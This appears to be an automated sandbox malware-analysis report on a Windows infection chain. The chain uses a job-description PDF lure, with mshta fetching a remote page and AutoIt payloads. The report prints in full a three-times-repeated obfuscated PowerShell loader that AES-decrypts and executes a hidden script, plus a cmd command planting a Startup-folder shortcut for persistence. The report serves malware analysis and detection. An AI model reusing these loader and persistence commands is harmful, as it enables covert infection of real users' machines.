Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghepduy1325Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA70781E018E4DFB87CD05CEA8267DFEEC57474934D2E72FED942DC3B6E04D01F82804DECEF13DC95D9F76B95330BE652C3F5ECAB21E4D67450285F38D92BE31580C4E736177BF71474B83457639E9C2881131387C24401F97A86AE28EF1CFA3564CF1974B4ACC0F6695257FA23A2DDB11745C35D97B3064A0BAAF7A97272149C51840237CA06689453D6A5F8B46678E8011672959BFCB6DFD142A3ED66ADE572299E442A73D667DF9462BE96290706311211F2CE31646E4040EBF2F7AA2CB9DC7FCF0E3D67762E76457BAA609917136F01E489A97E9A7FB17C6965F15CFF50FF5637D62983F02A4262193FDA98C9A16EF2DA91F27193760578614D5E2613AC07AC1CCB5EF6F587BC781DF31F55B65181C86F562B2BD2A35461CAC5C101B21214506A52C17834FA44C6E0DEF1A1E9CB0715D93135D5BBF09E6FCCE528E1DA3761E0A1F265D5F0FB3FA2E21AC770F6F27CC1EC289352FC35A8C7DE18C442B194FDCFA10DB3DA7CDE32FD8403F449D8FC75BE84A071B70C8F5544157502E7B2071633BA5B9D659AB9028E480647AA8FE41712E40CDB4E6A26F3268BFCF26F9072B471B8C282387E4DBA4EBC93609965409C1A65C0C57DF0CE49EC876F91C5A96386BD60817F78D48A9D0148412611DA9639CF9834309BE5DACA432F3ACBDFA219E5B95B26C009CFC00CF54BE154220779009DDC479CBDFEB32FC40336CC86D179FF44CD5B390F941A50D06D52FAFC8F32DB72C3505502F57C9EAA8B71200A218380D35F04EDC8E95B91FA86829B4510AD91625BBE54DB1D3237B08832E5C8289753B1D32B208E9E6AA7E281982490307DB6935EA25109C185FC165625387C55175929D993B0A9A3B1022C240A5ACB0431E98C81D66C70D1DC29B7F9909E6515937CDB3D283F4B12B4C4D6E3F28F0B7F5FD07BA8EDC2B28158165A3FB91BF281D1C320E33D3C8D25C1ABC674AB74EA1BE51CF9A35EC73C41528008D4E8200333FAB1BFEDC6C324ED62E667038A747AA71059CF2CF52ED74304019637D834465D06062AAA679880D486BEED29E51CBB32E274D08CF418E16AC10216BB620E504A77D4771DF75717D83FEB1DA9EA2224B0AB6051F81C35169397369EDE2B5FCAD429BA6B5E93A03CD2128D91B05F33C31AA36E6F16AFEB422B869409A043987E74028E99F3553B4AC0943C7347DBDB9818608468516E754F4271494E6951625143456D';function yVE ($UZpVPhOy){return -split ($UZpVPhOy -replace '..', '0x$& ')};$foocSK = yVE($ddg.SubString(0, 2016));$vAM = [System.Security.Cryptography.Aes]::Create();$vAM.Key = yVE($ddg.SubString(2016));$vAM.IV = New-Object byte[] 16;$MnEAtBA = $vAM.CreateDecryptor();$QXykJ = [System.String]::new($MnEAtBA.TransformFinalBlock($foocSK, 0,$foocSK.Length)); sal fd $QXykJ.Substring(3,3); fd $QXykJ.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dqcwif.exe "C:\Users\user\AppData\Roaming\dqcwif.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '4734f167e688b712e3d248343d2e8f27f45efeb66cef33e5f71e91f4d577d03d307a3816965837cd191787df5ed88323f20d1c6944c9100f6d044db74b45638f201d8bae55a1de539bf3c012438184ffecf2a18aa75a38b5fa2b30e3775a68700359403c96690a310e0fa61de6143a7a471cabd4ae708c72cf84b7a1dc559f9dcf0aabdd03fca45762903f51468bef8488494e7b7429432a3a1baedbf4833deea70781e018e4dfb87cd05cea8267dfeec57474934d2e72fed942dc3b6e04d01f82804decef13dc95d9f76b95330be652c3f5ecab21e4d67450285f38d92be31580c4e736177bf71474b83457639e9c2881131387c24401f97a86ae28ef1cfa3564cf1974b4acc0f6695257fa23a2ddb11745c35d97b3064a0baaf7a97272149c51840237ca06689453d6a5f8b46678e8011672959bfcb6dfd142a3ed66ade572299e442a73d667df9462be96290706311211f2ce31646e4040ebf2f7aa2cb9dc7fcf0e3d67762e76457baa609917136f01e489a97e9a7fb17c6965f15cff50ff5637d62983f02a4262193fda98c9a16ef2da91f27193760578614d5e2613ac07ac1ccb5ef6f587bc781df31f55b65181c86f562b2bd2a35461cac5c101b21214506a52c17834fa44c6e0def1a1e9cb0715d93135d5bbf09e6fcce528e1da3761e0a1f265d5f0fb3fa2e21ac770f6f27cc1ec289352fc35a8c7de18c442b194fdcfa10db3da7cde32fd8403f449d8fc75be84a071b70c8f5544157502e7b2071633ba5b9d659ab9028e480647aa8fe41712e40cdb4e6a26f3268bfcf26f9072b471b8c282387e4dba4ebc93609965409c1a65c0c57df0ce49ec876f91c5a96386bd60817f78d48a9d0148412611da9639cf9834309be5daca432f3acbdfa219e5b95b26c009cfc00cf54be154220779009ddc479cbdfeb32fc40336cc86d179ff44cd5b390f941a50d06d52fafc8f32db72c3505502f57c9eaa8b71200a218380d35f04edc8e95b91fa86829b4510ad91625bbe54db1d3237b08832e5c8289753b1d32b208e9e6aa7e281982490307db6935ea25109c185fc165625387c55175929d993b0a9a3b1022c240a5acb0431e98c81d66c70d1dc29b7f9909e6515937cdb3d283f4b12b4c4d6e3f28f0b7f5fd07ba8edc2b28158165a3fb91bf281d1c320e33d3c8d25c1abc674ab74ea1be51cf9a35ec73c41528008d4e8200333fab1bfedc6c324ed62e667038a747aa71059cf2cf52ed74304019637d834465d06062aaa679880d486beed29e51cbb32e274d08cf418e16ac10216bb620e504a77d4771df75717d83feb1da9ea2224b0ab6051f81c35169397369ede2b5fcad429ba6b5e93a03cd2128d91b05f33c31aa36e6f16afeb422b869409a043987e74028e99f3553b4ac0943c7347dbdb9818608468516e754f4271494e6951625143456d';function yve ($uzpvphoy){return -split ($uzpvphoy -replace '..', '0x$& ')};$foocsk = yve($ddg.substring(0, 2016));$vam = [system.security.cryptography.aes]::create();$vam.key = yve($ddg.substring(2016));$vam.iv = new-object byte[] 16;$mneatba = $vam.createdecryptor();$qxykj = [system.string]::new($mneatba.transformfinalblock($foocsk, 0,$foocsk.length)); sal fd $qxykj.substring(3,3); fd $qxykj.substring(6)
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '4734f167e688b712e3d248343d2e8f27f45efeb66cef33e5f71e91f4d577d03d307a3816965837cd191787df5ed88323f20d1c6944c9100f6d044db74b45638f201d8bae55a1de539bf3c012438184ffecf2a18aa75a38b5fa2b30e3775a68700359403c96690a310e0fa61de6143a7a471cabd4ae708c72cf84b7a1dc559f9dcf0aabdd03fca45762903f51468bef8488494e7b7429432a3a1baedbf4833deea70781e018e4dfb87cd05cea8267dfeec57474934d2e72fed942dc3b6e04d01f82804decef13dc95d9f76b95330be652c3f5ecab21e4d67450285f38d92be31580c4e736177bf71474b83457639e9c2881131387c24401f97a86ae28ef1cfa3564cf1974b4acc0f6695257fa23a2ddb11745c35d97b3064a0baaf7a97272149c51840237ca06689453d6a5f8b46678e8011672959bfcb6dfd142a3ed66ade572299e442a73d667df9462be96290706311211f2ce31646e4040ebf2f7aa2cb9dc7fcf0e3d67762e76457baa609917136f01e489a97e9a7fb17c6965f15cff50ff5637d62983f02a4262193fda98c9a16ef2da91f27193760578614d5e2613ac07ac1ccb5ef6f587bc781df31f55b65181c86f562b2bd2a35461cac5c101b21214506a52c17834fa44c6e0def1a1e9cb0715d93135d5bbf09e6fcce528e1da3761e0a1f265d5f0fb3fa2e21ac770f6f27cc1ec289352fc35a8c7de18c442b194fdcfa10db3da7cde32fd8403f449d8fc75be84a071b70c8f5544157502e7b2071633ba5b9d659ab9028e480647aa8fe41712e40cdb4e6a26f3268bfcf26f9072b471b8c282387e4dba4ebc93609965409c1a65c0c57df0ce49ec876f91c5a96386bd60817f78d48a9d0148412611da9639cf9834309be5daca432f3acbdfa219e5b95b26c009cfc00cf54be154220779009ddc479cbdfeb32fc40336cc86d179ff44cd5b390f941a50d06d52fafc8f32db72c3505502f57c9eaa8b71200a218380d35f04edc8e95b91fa86829b4510ad91625bbe54db1d3237b08832e5c8289753b1d32b208e9e6aa7e281982490307db6935ea25109c185fc165625387c55175929d993b0a9a3b1022c240a5acb0431e98c81d66c70d1dc29b7f9909e6515937cdb3d283f4b12b4c4d6e3f28f0b7f5fd07ba8edc2b28158165a3fb91bf281d1c320e33d3c8d25c1abc674ab74ea1be51cf9a35ec73c41528008d4e8200333fab1bfedc6c324ed62e667038a747aa71059cf2cf52ed74304019637d834465d06062aaa679880d486beed29e51cbb32e274d08cf418e16ac10216bb620e504a77d4771df75717d83feb1da9ea2224b0ab6051f81c35169397369ede2b5fcad429ba6b5e93a03cd2128d91b05f33c31aa36e6f16afeb422b869409a043987e74028e99f3553b4ac0943c7347dbdb9818608468516e754f4271494e6951625143456d';function yve ($uzpvphoy){return -split ($uzpvphoy -replace '..', '0x$& ')};$foocsk = yve($ddg.substring(0, 2016));$vam = [system.security.cryptography.aes]::create();$vam.key = yve($ddg.substring(2016));$vam.iv = new-object byte[] 16;$mneatba = $vam.createdecryptor();$qxykj = [system.string]::new($mneatba.transformfinalblock($foocsk, 0,$foocsk.length)); sal fd $qxykj.substring(3,3); fd $qxykj.substring(6)Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B8C5FC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_00007FF6B5B8C5FC
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B8D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_00007FF6B5B8D540
Source: dqcwif.exe, 00000013.00000000.2367160497.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmp, Guard.exe, 0000001C.00000003.2506926999.0000000004A1A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001C.00000000.2484628798.00000000006A6000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: dqcwif.exeBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B5FD20 cpuid 19_2_00007FF6B5B5FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B5BEF8 GetSystemTimeAsFileTime,19_2_00007FF6B5B5BEF8
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B82BCF GetUserNameW,19_2_00007FF6B5B82BCF
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B62650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_00007FF6B5B62650
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B41D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,19_2_00007FF6B5B41D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000018.00000002.2593196505.0000020375BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000018.00000002.2503038177.000002035DED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: powershell.exe, 00000018.00000002.2606180897.0000020375E8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c\Guard.exe
Source: powershell.exe, 00000018.00000002.2503038177.000002035DED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000018.00000002.2593196505.0000020375C30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2606180897.0000020375E5D000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001C.00000003.2507498251.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001C.00000003.2507391049.0000000004870000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001C.00000003.2502385091.0000000004870000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001C.00000003.2499867757.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001C.00000003.2502607286.0000000004870000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001C.00000003.2486492753.0000000004870000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001C.00000003.2486684935.0000000004870000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001C.00000003.2500397628.0000000004870000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001C.00000003.2500563044.0000000004870000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: powershell.exe, 00000018.00000002.2491548979.000002035BC38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2C:\Users\Public\Guard.exe
Source: powershell.exe, 00000018.00000002.2503038177.000002035DED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2503038177.000002035DA51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2491548979.000002035BC38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2593196505.0000020375BC6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2606180897.0000020375E8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000018.00000002.2503038177.000002035DED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: dqcwif.exeBinary or memory string: WIN_81
Source: dqcwif.exeBinary or memory string: WIN_XP
Source: dqcwif.exeBinary or memory string: WIN_XPe
Source: dqcwif.exeBinary or memory string: WIN_VISTA
Source: dqcwif.exe.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: dqcwif.exeBinary or memory string: WIN_7
Source: dqcwif.exeBinary or memory string: WIN_8
Source: Guard.exe.20.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_00007FF6B5BB4074
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,19_2_00007FF6B5BB3940
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
21
Windows Management Instrumentation
1
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
11
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
12
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol1
Email Collection
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares11
Input Capture
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
PowerShell
2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
Timestomp
NTDS38
System Information Discovery
Distributed Component Object Model3
Clipboard Data
23
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
1
DLL Side-Loading
LSA Secrets151
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
231
Masquerading
